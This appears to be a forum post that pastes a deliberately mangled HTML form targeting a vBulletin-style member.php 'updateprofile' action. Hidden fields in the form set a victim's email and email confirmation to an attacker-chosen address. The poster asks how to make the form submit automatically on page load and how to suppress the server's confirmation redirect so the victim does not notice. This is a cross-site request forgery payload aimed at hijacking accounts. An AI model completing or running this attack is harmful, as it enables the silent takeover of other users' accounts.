Code:
< fo rm action="http://URL/member.php" method=pos t>
inp ut type="hidden" name="s" value="">
<tr>
<t d bgcolor="#FAFAFA"><font face="verdana, arial, helvetica" size="2">inpu t type="hidden" class="bginput" name="email" value="[email protected]" size="30" maxlength="150"></font></td>
</tr>
<tr>
<t d bgcolor="#FAFAFA"><font face="verdana, arial, helvetica" size="2">hahahahahahaha type="hidden" class="bginput" name="emailconfirm" value="[email protected]" size="30" maxlength="150"></font></td>
</tr>
</table>
</td></tr></table>
<br>
<table cellpadding="2" cellspacing="0" border="0" width="98%" align="center">
<tr>
<td align="center"><font face="verdana, arial, helvetica" size="2">
inpu t type="hidden" name="action" value="updateprofile">
inpu t type="submit" class="bginput" name="Submit" value="Submit" accesskey="s">
</font></td>
</tr>
</table>
</form>
</td>
</tr>
I need that to auto submit onload and then the confirmation url sent by the server to be nulled so the page isnt redirected.